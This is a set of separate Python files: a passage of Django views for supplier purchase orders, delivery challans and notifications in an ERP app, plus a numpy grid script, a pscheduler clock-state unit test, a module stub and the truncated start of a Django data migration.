            ws.write(row_num, col_num, row[col_num], font_style)
    wb.save(response)
    return response
@login_required
@user_passes_test(allow_purchase_order_display)
def purchase_order_supplier(request):
    """Render the supplier purchase-order overview page."""
    session_company = request.session['company']
    company = Q(company_id = Company_info.objects.get(id = session_company))
    # NOTE(review): `company` is built but never applied to the queryset
    # below — confirm whether this list should be company-scoped.
    context = {
        'all_po': PoHeaderSupplier.objects.all(),
        'permission': purchase_order_roles(request.user),
        'allow_customer_roles': customer_roles(request.user),
        'allow_supplier_roles': supplier_roles(request.user),
        'allow_transaction_roles': transaction_roles(request.user),
        'allow_inventory_roles': inventory_roles(request.user),
        'allow_report_roles': report_roles(request.user),
        'is_superuser': request.user.is_superuser,
    }
    return render(request, 'supplier/purchase_order_supplier.html', context)
@login_required
@user_passes_test(allow_purchase_order_add)
def new_purchase_order_supplier(request):
    """Create a new supplier purchase order.

    GET renders the entry form with the next PO number pre-computed. An AJAX
    POST carrying 'item_code_po' returns the matching product serialized as
    JSON. A full POST creates the PoHeaderSupplier row and one
    PoDetailSupplier row per item in the 'items' JSON payload.
    """
    company = request.session['company']
    company = Company_info.objects.get(id = company)
    allow_customer_roles = customer_roles(request.user)
    allow_supplier_roles = supplier_roles(request.user)
    allow_transaction_roles = transaction_roles(request.user)
    allow_inventory_roles = inventory_roles(request.user)
    get_last_po_no = PoHeaderSupplier.objects.last()
    # Fix: call .all() — the original passed the unbound manager method
    # (`Add_products.objects.all`) into the template context instead of a
    # queryset (cf. new_quotation_supplier, which calls .all()).
    all_item_code = Add_products.objects.all()
    all_accounts = ChartOfAccount.objects.all()
    if get_last_po_no:
        # Next number = last three characters of the latest po_no + 1.
        # NOTE(review): assumes the numeric suffix is always three digits.
        get_last_po_no = get_last_po_no.po_no
        get_last_po_no = get_last_po_no[-3:]
        num = int(get_last_po_no)
        num = num + 1
        get_last_po_no = 'PO/SP/' + str(num)
    else:
        # First PO ever: start the sequence at 101.
        get_last_po_no = 'PO/SP/101'
    # AJAX product lookup for the item-code autocomplete.
    item_code_po = request.POST.get('item_code_po',False)
    if item_code_po:
        data = Add_products.objects.filter(product_code = item_code_po)
        for value in data:
            print(value.product_code)
        row = serializers.serialize('json',data)
        return HttpResponse(json.dumps({'row':row}))
    if request.method == 'POST':
        supplier = request.POST.get('supplier',False)
        attn = request.POST.get('attn',False)
        prcbasis = request.POST.get('prcbasis',False)
        leadtime = request.POST.get('leadtime',False)
        validity = request.POST.get('validity',False)
        payment = request.POST.get('payment',False)
        remarks = request.POST.get('remarks',False)
        currency = request.POST.get('currency',False)
        exchange_rate = request.POST.get('exchange_rate',False)
        follow_up = request.POST.get('follow_up',False)
        footer_remarks = request.POST.get('footer_remarks',False)
        try:
            account_id = ChartOfAccount.objects.get(account_title = supplier)
        except ChartOfAccount.DoesNotExist:
            return JsonResponse({"result":"No Account Found "+supplier+""})
        date = datetime.date.today()
        po_header = PoHeaderSupplier(po_no = get_last_po_no, date = date, attn = attn, prc_basis = prcbasis,
        leadtime = leadtime, validity = validity, payment = payment, remarks = remarks, currency = currency,
        exchange_rate = exchange_rate, follow_up = follow_up, show_notification = True, footer_remarks = footer_remarks ,account_id = account_id, company_id = company, user_id = request.user)
        po_header.save()
        items = json.loads(request.POST.get('items'))
        # Re-fetch the header so the detail rows get a saved FK target.
        header_id = PoHeaderSupplier.objects.get(po_no = get_last_po_no)
        for value in items:
            id = value["id"]
            id = Add_products.objects.get(id = id)
            po_detail = PoDetailSupplier(item_id = id, quantity = value["quantity"], unit = value["unit"], unit_price = value["unit_price"], remarks = value["remarks"], quotation_no = "to be define" ,po_id = header_id)
            po_detail.save()
        return JsonResponse({'result':'success'})
    return render(request, 'supplier/new_purchase_order_supplier.html',{'all_item_code':all_item_code,'get_last_po_no':get_last_po_no, 'all_accounts': all_accounts,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
@user_passes_test(allow_purchase_order_edit)
def edit_purchase_order_supplier(request,pk):
    """Edit an existing supplier purchase order (header plus detail lines).

    GET renders the edit form. An AJAX POST carrying 'item_code' returns the
    matching product serialized as JSON (or a message when the item already
    appears on this PO). A full POST deletes every existing detail row and
    re-creates them from the submitted 'items' JSON payload, after updating
    the header fields.
    """
    company = request.session['company']
    company = Company_info.objects.get(id = company)
    company = Q(company_id = company)  # used to scope the header lookup below
    allow_customer_roles = customer_roles(request.user)
    allow_supplier_roles = supplier_roles(request.user)
    allow_transaction_roles = transaction_roles(request.user)
    allow_inventory_roles = inventory_roles(request.user)
    po_header = PoHeaderSupplier.objects.filter(company, id = pk).first()
    po_detail = PoDetailSupplier.objects.filter(po_id = po_header.id).all()
    all_item_code = list(Add_products.objects.values('product_code'))
    all_accounts = ChartOfAccount.objects.all()
    # AJAX item lookup: return the product row, or refuse duplicates.
    item_code = request.POST.get('item_code')
    if item_code:
        item_id = Add_products.objects.get(product_code = item_code)
        item_code_exist = PoDetailSupplier.objects.filter(item_id = item_id, po_id = po_header.id).first()
        data = Add_products.objects.filter(id = item_id.id)
        if item_code_exist:
            return HttpResponse(json.dumps({'message':"Item Already Exist"}))
        row = serializers.serialize('json',data)
        return HttpResponse(json.dumps({'row':row}))
    if request.method == 'POST':
        # Full save: drop the current detail rows; they are rewritten from
        # the submitted items below.
        po_detail.delete()
        edit_po_supplier = request.POST.get('supplier',False)
        edit_po_attn = request.POST.get('attn',False)
        edit_po_prcbasis = request.POST.get('prcbasis',False)
        edit_po_leadtime = request.POST.get('leadtime',False)
        edit_po_validity = request.POST.get('validity',False)
        edit_po_payment = request.POST.get('payment',False)
        edit_po_remarks = request.POST.get('remarks',False)
        edit_po_currency_rate = request.POST.get('currency',False)
        edit_po_exchange_rate = request.POST.get('exchange_rate',False)
        edit_po_follow_up = request.POST.get('follow_up',False)
        edit_footer_remarks = request.POST.get('edit_footer_remarks',False)
        try:
            account_id = ChartOfAccount.objects.get(account_title = edit_po_supplier)
        except ChartOfAccount.DoesNotExist:
            return JsonResponse({"result":"No Account Found "+edit_po_supplier+""})
        po_header.attn = edit_po_attn
        po_header.prc_basis = edit_po_prcbasis
        po_header.leadtime = edit_po_leadtime
        po_header.validity = edit_po_validity
        po_header.payment = edit_po_payment
        po_header.remarks = edit_po_remarks
        po_header.currency = edit_po_currency_rate
        po_header.exchange_rate = edit_po_exchange_rate
        po_header.footer_remarks = edit_footer_remarks
        po_header.follow_up = edit_po_follow_up
        po_header.account_id = account_id
        po_header.save()
        header_id = PoHeaderSupplier.objects.get(id = pk)
        items = json.loads(request.POST.get('items'))
        for value in items:
            id = value["id"]
            id = Add_products.objects.get(id = id)
            po_detail = PoDetailSupplier(item_id = id, quantity = value["quantity"], unit = value["unit"], unit_price = value["unit_price"], remarks = value["remarks"], quotation_no = "to be define" ,po_id = header_id)
            po_detail.save()
        return JsonResponse({"result":"success"})
    return render(request,'supplier/edit_purchase_order_supplier.html',{'po_header':po_header,'pk':pk,'po_detail':po_detail, 'all_item_code':all_item_code, 'all_accounts':all_accounts,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
@user_passes_test(allow_purchase_order_print)
def print_po_supplier(request,pk):
    """Render a supplier purchase order as an inline PDF response.

    Counts the printed lines consumed by each detail row (item descriptions
    may span several newline-separated lines) to compute `total_lines`, the
    filler rows the PDF template uses to pad the page, and totals the order
    amount (unit_price * quantity over all rows).
    """
    company = request.session['company']
    company = Company_info.objects.get(id = company)
    company = Q(company_id = company)  # scope the header lookup to this company
    allow_customer_roles = customer_roles(request.user)
    allow_supplier_roles = supplier_roles(request.user)
    allow_transaction_roles = transaction_roles(request.user)
    allow_inventory_roles = inventory_roles(request.user)
    lines = 0
    total_amount = 0
    company_info = Company_info.objects.all()
    # NOTE(review): the logo is always taken from company id 1, not the
    # session company — confirm this is intentional.
    image = Company_info.objects.filter(id = 1).first()
    print(image.company_logo)
    header = PoHeaderSupplier.objects.filter(company, id = pk).first()
    detail = PoDetailSupplier.objects.filter(po_id = header.id).all()
    for value in detail:
        # One printed line per newline-separated description fragment.
        lines = lines + len(value.item_description.split('\n'))
        amount = float(value.unit_price * value.quantity)
        total_amount = total_amount + amount
    print(total_amount)
    # Two additional lines per detail row, then pad to a 40-line page.
    lines = lines + len(detail) + len(detail)
    total_lines = 40 - lines
    pdf = render_to_pdf('supplier/po_supplier_pdf.html', {'company_info':company_info,'image':image,'header':header, 'detail':detail,'total_lines':total_lines,'total_amount':total_amount,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
    if pdf:
        response = HttpResponse(pdf, content_type='application/pdf')
        filename = "Po_Supplier_%s.pdf" %(header.po_no)
        content = "inline; filename='%s'" %(filename)
        response['Content-Disposition'] = content
        return response
    return HttpResponse("Not found")
@login_required
@user_passes_test(allow_purchase_order_delete)
def delete_purchase_order_supplier(request,pk):
    """Delete one supplier purchase order: detail rows first, then the header."""
    detail_rows = PoDetailSupplier.objects.filter(po_id_id = pk).all()
    detail_rows.delete()
    PoHeaderSupplier.objects.filter(id = pk).delete()
    messages.add_message(request, messages.SUCCESS, "Supplier Purchase Order Deleted")
    return redirect('purchase-order-supplier')
@login_required
@user_passes_test(allow_delivery_challan_display)
def delivery_challan_supplier(request):
    """Render the supplier delivery-challan overview page."""
    session_company = request.session['company']
    company = Q(company_id = Company_info.objects.get(id = session_company))
    # NOTE(review): `company` is built but never applied to the queryset
    # below — confirm whether this list should be company-scoped.
    context = {
        'all_dc': DcHeaderSupplier.objects.all(),
        'permission': delivery_challan_roles(request.user),
        'allow_customer_roles': customer_roles(request.user),
        'allow_supplier_roles': supplier_roles(request.user),
        'allow_transaction_roles': transaction_roles(request.user),
        'allow_inventory_roles': inventory_roles(request.user),
        'allow_report_roles': report_roles(request.user),
        'is_superuser': request.user.is_superuser,
    }
    return render(request, 'supplier/delivery_challan_supplier.html', context)
@login_required
@user_passes_test(allow_delivery_challan_add)
def new_delivery_challan_supplier(request):
    """Create a new supplier delivery challan (DC).

    GET renders the entry form with the next DC number pre-computed. An AJAX
    POST carrying 'item_code_dc' returns the matching product serialized as
    JSON. A full POST creates the DcHeaderSupplier row and one
    DcDetailSupplier row per item in the 'items' JSON payload, with accepted
    and returned quantities initialised to zero.
    """
    company = request.session['company']
    company = Company_info.objects.get(id = company)
    allow_customer_roles = customer_roles(request.user)
    allow_supplier_roles = supplier_roles(request.user)
    allow_transaction_roles = transaction_roles(request.user)
    allow_inventory_roles = inventory_roles(request.user)
    all_item_code = Add_products.objects.all()
    get_last_dc_no = DcHeaderSupplier.objects.last()
    all_accounts = ChartOfAccount.objects.all()
    if get_last_dc_no:
        # Next number = last three characters of the latest dc_no + 1.
        # NOTE(review): assumes the numeric suffix is always three digits.
        get_last_dc_no = get_last_dc_no.dc_no
        get_last_dc_no = get_last_dc_no[-3:]
        num = int(get_last_dc_no)
        num = num + 1
        get_last_dc_no = 'DC/SP/' + str(num)
    else:
        # First DC ever: start the sequence at 101.
        get_last_dc_no = 'DC/SP/101'
    # AJAX product lookup for the item-code autocomplete.
    item_code_dc = request.POST.get('item_code_dc',False)
    if item_code_dc:
        # Only the first 12 characters are the product code — TODO confirm.
        item_code_dc = item_code_dc[:12]
        data = Add_products.objects.filter(product_code = item_code_dc)
        for value in data:
            print(value.product_code)
        row = serializers.serialize('json',data)
        return HttpResponse(json.dumps({'row':row}))
    if request.method == 'POST':
        dc_supplier = request.POST.get('supplier')
        footer_remarks = request.POST.get('footer_remarks')
        follow_up = request.POST.get('follow_up')
        try:
            account_id = ChartOfAccount.objects.get(account_title = dc_supplier)
        except ChartOfAccount.DoesNotExist:
            return JsonResponse({"result":"No Account Found "+dc_supplier+""})
        date = datetime.date.today()
        dc_header = DcHeaderSupplier(dc_no = get_last_dc_no, date = date, footer_remarks = footer_remarks, follow_up = follow_up ,account_id = account_id, company_id = company, user_id = request.user)
        dc_header.save()
        items = json.loads(request.POST.get('items'))
        # Re-fetch the header so the detail rows get a saved FK target.
        header_id = DcHeaderSupplier.objects.get(dc_no = get_last_dc_no)
        for value in items:
            item_id = Add_products.objects.get(id = value["id"])
            dc_detail = DcDetailSupplier(item_id = item_id, quantity = value["quantity"],accepted_quantity = 0, returned_quantity = 0, po_no = "" ,dc_id = header_id)
            dc_detail.save()
        return JsonResponse({'result':'success'})
    return render(request, 'supplier/new_delivery_challan_supplier.html',{'all_item_code':all_item_code,'get_last_dc_no':get_last_dc_no,'all_accounts':all_accounts,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
@user_passes_test(allow_delivery_challan_edit)
def edit_delivery_challan_supplier(request,pk):
    """Edit an existing supplier delivery challan (header plus detail lines).

    GET renders the edit form. An AJAX POST carrying 'item_code' returns the
    matching product serialized as JSON (or a message when the item already
    appears on this DC). A full POST deletes every existing detail row and
    re-creates them from the submitted 'items' JSON payload, after updating
    the header fields.
    """
    company = request.session['company']
    company = Company_info.objects.get(id = company)
    company = Q(company_id = company)  # used to scope the header lookup below
    allow_customer_roles = customer_roles(request.user)
    allow_supplier_roles = supplier_roles(request.user)
    allow_transaction_roles = transaction_roles(request.user)
    allow_inventory_roles = inventory_roles(request.user)
    dc_header = DcHeaderSupplier.objects.filter(company, id = pk).first()
    dc_detail = DcDetailSupplier.objects.filter(dc_id = dc_header.id).all()
    all_accounts = ChartOfAccount.objects.all()
    all_item_code = list(Add_products.objects.values('product_code'))
    # AJAX item lookup: return the product row, or refuse duplicates.
    item_code = request.POST.get('item_code')
    if item_code:
        item_id = Add_products.objects.get(product_code = item_code)
        # Fix: duplicate check must filter on the header's id. The original
        # used `dc_id = dc_detail.id`, but dc_detail is a QuerySet (no .id
        # attribute), raising AttributeError on every lookup. Siblings
        # (edit_quotation_supplier, edit_purchase_order_supplier) all filter
        # on the header's id.
        item_code_exist = DcDetailSupplier.objects.filter(item_id = item_id, dc_id = dc_header.id).first()
        data = Add_products.objects.filter(id = item_id.id)
        if item_code_exist:
            return HttpResponse(json.dumps({'message':"Item Already Exist"}))
        row = serializers.serialize('json',data)
        return HttpResponse(json.dumps({'row':row}))
    if request.method == 'POST':
        # Full save: drop the current detail rows; they are rewritten from
        # the submitted items below.
        dc_detail.delete()
        dc_supplier = request.POST.get('supplier')
        follow_up = request.POST.get('follow_up')
        edit_footer_remarks = request.POST.get('edit_footer_remarks')
        try:
            account_id = ChartOfAccount.objects.get(account_title = dc_supplier)
        except ChartOfAccount.DoesNotExist:
            return JsonResponse({"result":"No Account Found "+dc_supplier+""})
        dc_header.account_id = account_id
        dc_header.follow_up = follow_up
        dc_header.footer_remarks = edit_footer_remarks
        dc_header.save()
        header_id = DcHeaderSupplier.objects.get(id = pk)
        items = json.loads(request.POST.get('items'))
        for value in items:
            print(value["id"])
            item_id = Add_products.objects.get(id = value["id"])
            dc_detail = DcDetailSupplier(item_id = item_id, quantity = value["quantity"],accepted_quantity = 0, returned_quantity = 0, po_no = "" ,dc_id = header_id, remarks = value["remarks"], unit = value["unit"])
            dc_detail.save()
        return JsonResponse({"result":"success"})
    return render(request,'supplier/edit_delivery_challan_supplier.html',{'dc_header':dc_header,'pk':pk,'dc_detail':dc_detail, 'all_item_code':all_item_code, 'all_accounts':all_accounts,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
@user_passes_test(allow_delivery_challan_print)
def print_dc_supplier(request,pk):
    """Render a supplier delivery challan as an inline PDF response.

    Counts the printed lines consumed by each detail row (item descriptions
    may span several newline-separated lines) to compute `total_lines`, the
    filler rows the PDF template uses to pad the page.
    """
    company = request.session['company']
    company = Company_info.objects.get(id = company)
    company = Q(company_id = company)  # scope the header lookup to this company
    allow_customer_roles = customer_roles(request.user)
    allow_supplier_roles = supplier_roles(request.user)
    allow_transaction_roles = transaction_roles(request.user)
    allow_inventory_roles = inventory_roles(request.user)
    lines = 0
    company_info = Company_info.objects.all()
    # NOTE(review): the logo is looked up by a hard-coded company name,
    # not the session company — confirm this is intentional.
    image = Company_info.objects.filter(company_name = "Hamza Enterprise").first()
    header = DcHeaderSupplier.objects.filter(company, id = pk).first()
    detail = DcDetailSupplier.objects.filter(dc_id = header.id).all()
    for value in detail:
        # One printed line per newline-separated description fragment.
        lines = lines + len(value.item_description.split('\n'))
    # Two additional lines per detail row, then pad to a 40-line page.
    lines = lines + len(detail) + len(detail)
    total_lines = 40 - lines
    pdf = render_to_pdf('supplier/dc_supplier_pdf.html', {'company_info':company_info,'image':image,'header':header, 'detail':detail,'total_lines':total_lines,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
    if pdf:
        response = HttpResponse(pdf, content_type='application/pdf')
        # Fix: this is a delivery challan, not a PO — the original filename
        # prefix "Po_Supplier_%s.pdf" mislabelled the download.
        filename = "Dc_Supplier_%s.pdf" %(header.dc_no)
        content = "inline; filename='%s'" %(filename)
        response['Content-Disposition'] = content
        return response
    return HttpResponse("Not found")
@login_required
@user_passes_test(allow_delivery_challan_delete)
def delete_delivery_challan_supplier(request,pk):
    """Delete one supplier delivery challan: detail rows first, then the header."""
    detail_rows = DcDetailSupplier.objects.filter(dc_id_id = pk).all()
    detail_rows.delete()
    DcHeaderSupplier.objects.filter(id = pk).delete()
    messages.add_message(request, messages.SUCCESS, "Supplier Delivery Challan Deleted")
    return redirect('delivery-challan-supplier')
@login_required
@user_passes_test(allow_mrn_display)
def mrn_supplier(request):
    """Render the supplier MRN overview page (built from delivery challans)."""
    session_company = request.session['company']
    company = Q(company_id = Company_info.objects.get(id = session_company))
    # NOTE(review): `company` is built but never applied to the queryset
    # below — confirm whether this list should be company-scoped.
    context = {
        'all_dc': DcHeaderSupplier.objects.all(),
        'permission': mrn_roles(request.user),
        'allow_customer_roles': customer_roles(request.user),
        'allow_supplier_roles': supplier_roles(request.user),
        'allow_transaction_roles': transaction_roles(request.user),
        'allow_inventory_roles': inventory_roles(request.user),
        'allow_report_roles': report_roles(request.user),
        'is_superuser': request.user.is_superuser,
    }
    return render(request, 'supplier/mrn_supplier.html', context)
@login_required
@user_passes_test(allow_mrn_edit)
def edit_mrn_supplier(request, pk):
    """Edit the MRN data of one supplier delivery challan.

    GET renders the edit form; POST updates the header's follow-up date
    and each detail row's accepted quantity, then replies with JSON.
    """
    company = request.session['company']
    company = Company_info.objects.get(id = company)
    company = Q(company_id = company)
    allow_customer_roles = customer_roles(request.user)
    allow_supplier_roles = supplier_roles(request.user)
    allow_transaction_roles = transaction_roles(request.user)
    allow_inventory_roles = inventory_roles(request.user)
    dc_header = DcHeaderSupplier.objects.filter(company, id=pk).first()
    dc_detail = DcDetailSupplier.objects.filter(dc_id=dc_header.id).all()
    if request.method == 'POST':
        # follow_up defaults to False when the field is absent -- that False
        # is saved onto the header as-is.
        follow_up = request.POST.get('follow_up', False)
        dc_header.follow_up = follow_up
        dc_header.save()
        # items is a JSON array positionally aligned with dc_detail.
        # NOTE(review): if the client sends fewer items than there are
        # detail rows, items[i] raises IndexError -- confirm the form
        # always posts one entry per row.
        items = json.loads(request.POST.get('items'))
        for i,value in enumerate(dc_detail):
            value.accepted_quantity = items[i]["accepted_quantity"]
            value.save()
        return JsonResponse({"result":"success"})
    return render(request, 'supplier/edit_mrn_supplier.html',{'dc_header':dc_header,'dc_detail':dc_detail,'pk':pk,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
def show_notification(request):
    """Resolve a customer-side notification event id to its account title.

    The first two characters of eventId select the transaction type
    (DC / PO / QU / RF); the matching header row supplies the account
    title and transaction number returned as JSON.  Anything else falls
    through to rendering the index page.
    """
    company = request.session['company']
    company = Company_info.objects.get(id=company)
    company = Q(company_id=company)
    allow_customer_roles = customer_roles(request.user)
    allow_supplier_roles = supplier_roles(request.user)
    allow_transaction_roles = transaction_roles(request.user)
    allow_inventory_roles = inventory_roles(request.user)
    eventId = request.POST.get('eventId', False)
    if eventId:
        # Prefix -> (model, number field) dispatch table.
        dispatch = {
            "DC": (DcHeaderCustomer, "dc_no"),
            "PO": (PoHeaderCustomer, "po_no"),
            "QU": (QuotationHeaderCustomer, "quotation_no"),
            "RF": (RfqCustomerHeader, "rfq_no"),
        }
        entry = dispatch.get(eventId[:2])
        if entry is not None:
            model, field = entry
            account_info = model.objects.filter(company, **{field: eventId}).first()
            return JsonResponse({
                'account_title': account_info.account_id.account_title,
                'tran_no': getattr(account_info, field),
            })
    return render(request, 'supplier/index.html', {
        'allow_customer_roles': allow_customer_roles,
        'allow_supplier_roles': allow_supplier_roles,
        'allow_transaction_roles': allow_transaction_roles,
        'allow_inventory_roles': allow_inventory_roles,
        'allow_report_roles': report_roles(request.user),
        'is_superuser': request.user.is_superuser,
    })
@login_required
def update_notification_customer(request):
    """Postpone or silence a customer-side transaction notification.

    POST fields: tran_no (prefixed DC/PO/QU/RF), optional
    postpone_customer date (defaults to today) and optional turn_off
    flag (defaults to 1).  Always redirects back home.
    """
    company = request.session['company']
    company = Company_info.objects.get(id=company)
    company = Q(company_id=company)
    allow_customer_roles = customer_roles(request.user)
    allow_supplier_roles = supplier_roles(request.user)
    allow_transaction_roles = transaction_roles(request.user)
    allow_inventory_roles = inventory_roles(request.user)
    if request.method == "POST":
        # Falsy form values fall back to their defaults.
        turn_off = request.POST.get("turn_off", False) or 1
        postpone_customer = (request.POST.get("postpone_customer", False)
                             or datetime.date.today())
        print(postpone_customer)
        tran_no = request.POST.get("tran_no", False)
        # Prefix -> (model, number field) dispatch table.
        dispatch = {
            "DC": (DcHeaderCustomer, "dc_no"),
            "PO": (PoHeaderCustomer, "po_no"),
            "QU": (QuotationHeaderCustomer, "quotation_no"),
            "RF": (RfqCustomerHeader, "rfq_no"),
        }
        entry = dispatch.get(tran_no[:2])
        if entry is not None:
            model, field = entry
            record = model.objects.filter(company, **{field: tran_no}).first()
            record.follow_up = postpone_customer
            record.show_notification = turn_off
            record.save()
        return redirect('home')
    return redirect('home')
@login_required
def show_notification_supplier(request):
    """Resolve a supplier-side notification event id to its account title.

    Mirrors show_notification() but against the supplier header models.
    Returns JSON for a recognised DC/PO/QU/RF prefix, otherwise renders
    the index page.
    """
    company = request.session['company']
    company = Company_info.objects.get(id=company)
    company = Q(company_id=company)
    allow_customer_roles = customer_roles(request.user)
    allow_supplier_roles = supplier_roles(request.user)
    allow_transaction_roles = transaction_roles(request.user)
    allow_inventory_roles = inventory_roles(request.user)
    eventId = request.POST.get('eventId', False)
    if eventId:
        # Prefix -> (model, number field) dispatch table.
        dispatch = {
            "DC": (DcHeaderSupplier, "dc_no"),
            "PO": (PoHeaderSupplier, "po_no"),
            "QU": (QuotationHeaderSupplier, "quotation_no"),
            "RF": (RfqSupplierHeader, "rfq_no"),
        }
        entry = dispatch.get(eventId[:2])
        if entry is not None:
            model, field = entry
            account_info = model.objects.filter(company, **{field: eventId}).first()
            return JsonResponse({
                'account_title': account_info.account_id.account_title,
                'tran_no': getattr(account_info, field),
            })
    return render(request, 'supplier/index.html', {
        'allow_customer_roles': allow_customer_roles,
        'allow_supplier_roles': allow_supplier_roles,
        'allow_transaction_roles': allow_transaction_roles,
        'allow_inventory_roles': allow_inventory_roles,
        'allow_report_roles': report_roles(request.user),
        'is_superuser': request.user.is_superuser,
    })
@login_required
def update_notification_supplier(request):
    """Postpone or silence a supplier-side transaction notification.

    Mirrors update_notification_customer() against the supplier header
    models.  Always redirects back home.
    """
    company = request.session['company']
    company = Company_info.objects.get(id=company)
    company = Q(company_id=company)
    allow_customer_roles = customer_roles(request.user)
    allow_supplier_roles = supplier_roles(request.user)
    allow_transaction_roles = transaction_roles(request.user)
    allow_inventory_roles = inventory_roles(request.user)
    if request.method == "POST":
        # Falsy form values fall back to their defaults.
        turn_off = request.POST.get("turn_off", False) or 1
        postpone_supplier = (request.POST.get("postpone_supplier", False)
                             or datetime.date.today())
        print(postpone_supplier)
        tran_no = request.POST.get("tran_no", False)
        print(tran_no)
        # Prefix -> (model, number field) dispatch table.
        dispatch = {
            "DC": (DcHeaderSupplier, "dc_no"),
            "PO": (PoHeaderSupplier, "po_no"),
            "QU": (QuotationHeaderSupplier, "quotation_no"),
            "RF": (RfqSupplierHeader, "rfq_no"),
        }
        entry = dispatch.get(tran_no[:2])
        if entry is not None:
            model, field = entry
            record = model.objects.filter(company, **{field: tran_no}).first()
            record.follow_up = postpone_supplier
            record.show_notification = turn_off
            record.save()
        return redirect('home')
    return redirect('home')
@login_required
def journal_voucher(request):
    """Render the journal voucher page with the caller's role flags.

    BUG FIX: the original called render('transaction/journal_voucher.html',
    {...}) without the request argument; django.shortcuts.render requires
    the request first, so the view raised a TypeError on every hit.
    """
    allow_customer_roles = customer_roles(request.user)
    allow_supplier_roles = supplier_roles(request.user)
    allow_transaction_roles = transaction_roles(request.user)
    allow_inventory_roles = inventory_roles(request.user)
    # Read but currently unused; kept for parity with the posted form.
    account_title = request.POST.get('account_title', False)
    return render(request, 'transaction/journal_voucher.html', {
        'allow_customer_roles': allow_customer_roles,
        'allow_supplier_roles': allow_supplier_roles,
        'allow_transaction_roles': allow_transaction_roles,
        'allow_inventory_roles': allow_inventory_roles,
        'allow_report_roles': report_roles(request.user),
        'is_superuser': request.user.is_superuser,
    })
@login_required
def change_company_view(request, pk):
    """Switch the session's active company to *pk* and go home."""
    request.session['company'] = pk
    return redirect('home')
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 24 03:01:13 2018
"""
import numpy as np

# Grids for a value-function iteration: capital today (k), capital
# tomorrow (kprime) and a discrete productivity state (z).
k = np.linspace(1, 10, 10)
kprime = np.linspace(1, 10, 10)
z = np.array([1, 2, 3, 4])

# (1) 2-D grid (capital x shock) for the value function itself.
kk, zz = np.meshgrid(k, z, indexing='ij')

# (2) 3-D grid (k' x k x z) precomputed once so the expected-value
# step does not rebuild it every iteration.
kkkprime, kkk, zzz = np.meshgrid(k, k, z, indexing='ij')
#!/usr/bin/env python3
"""
test for the Clockstate module.
"""
import unittest
from base_test import PschedTestBase
from pscheduler.clockstate import clock_state
class TestClockstate(PschedTestBase):
    """
    Clockstate tests.
    """

    def test_clockstate(self):
        """Test clockstate"""
        cstate = clock_state()
        # The state is always a dict carrying at least these two keys.
        self.assertTrue(isinstance(cstate, dict))
        self.assertTrue("time" in cstate)
        self.assertTrue("synchronized" in cstate)
        if cstate["synchronized"]:
            # A synchronized clock must report its source and reference;
            # "offset" is optional and "error" must be absent.
            self.assertTrue("source" in cstate)
            # Offset is optional.
            self.assertTrue("reference" in cstate)
            self.assertFalse("error" in cstate)
        else:
            # An unsynchronized clock reports none of the sync details.
            self.assertFalse("source" in cstate)
            self.assertFalse("offset" in cstate)
            self.assertFalse("reference" in cstate)
# Allow running this test module directly with `python`.
if __name__ == '__main__':
    unittest.main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# _Author_: xiaofengShi
# Date: 2018-03-25 10:50:53
# Last Modified by: xiaofengShi
# Last Modified time: 2018-03-25 10:50:53
'''
Reference url: https://pastebin.com/9NNk0uMB

(Translated from mis-encoded Chinese; the original text was mojibake,
so this is the approximate intent -- confirm against the upstream repo:)
1. Find a dataset used for mathematical-formula recognition and train on it?
2. Generate images from the formulas.
'''
import os
# Bare documentation string describing the character set this module
# is meant to generate (translated from mis-encoded Chinese).
'''
Characters of the generated library:
0-9
'''
# Generated by Django 2.1.7 on 2019-04-14 19:28
from django.db import migrations
def copy_data_to_debt_app(apps, schema_editor):
    """Copy budget-app rows into the new debt app, preserving ids.

    AccountHolder -> AccountHolder, Account -> CreditLine and
    Statement -> Statement.  Uses the historical models provided by the
    migration framework and the migration's database alias so the copy
    works on any configured database.
    """
    # Historical (frozen) model classes -- never import the live models
    # in a migration.
    b_AccountHolder = apps.get_model('budget.AccountHolder')
    b_Account = apps.get_model('budget.Account')
    b_Statement = apps.get_model('budget.Statement')
    d_AccountHolder = apps.get_model('debt.AccountHolder')
    d_CreditLine = apps.get_model('debt.CreditLine')
    d_Statement = apps.get_model('debt.Statement')
    db_alias = schema_editor.connection.alias
    for b_ah in b_AccountHolder.objects.using(db_alias).all():
        d_AccountHolder.objects.using(db_alias).create(
            id=b_ah.id, user=b_ah.user, name=b_ah.name)
    for b_a in b_Account.objects.using(db_alias).all():
        # ids are copied verbatim so Statement.account_id keeps pointing
        # at the right credit line after the copy.
        d_CreditLine.objects.using(db_alias).create(
            id=b_a.id,
            user=b_a.user,
            name=b_a.name,
            holder_id=b_a.holder_id,
            statement_date=b_a.statement_date,
            date_opened=b_a.date_opened,
            annual_fee=b_a.annual_fee,
            interest_rate=b_a.interest_rate,
            credit_line=b_a.credit_line,
